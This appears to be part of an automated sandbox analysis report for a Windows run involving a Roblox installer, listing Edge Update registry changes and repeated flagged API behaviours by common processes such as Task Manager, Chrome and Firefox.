Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB} C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachineFallback\CurVer\ = "MicrosoftEdgeUpdate.PolicyStatusMachineFallback.1.0" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\ = "Microsoft Edge Update Update3Web" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69} C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\"" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\msedgeupdate.dll,-1004" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3WebMachineFallback" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
N/A N/A C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4232 wrote to memory of 432 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3348 wrote to memory of 4916 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4812 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4812 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4916 wrote to memory of 4952 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
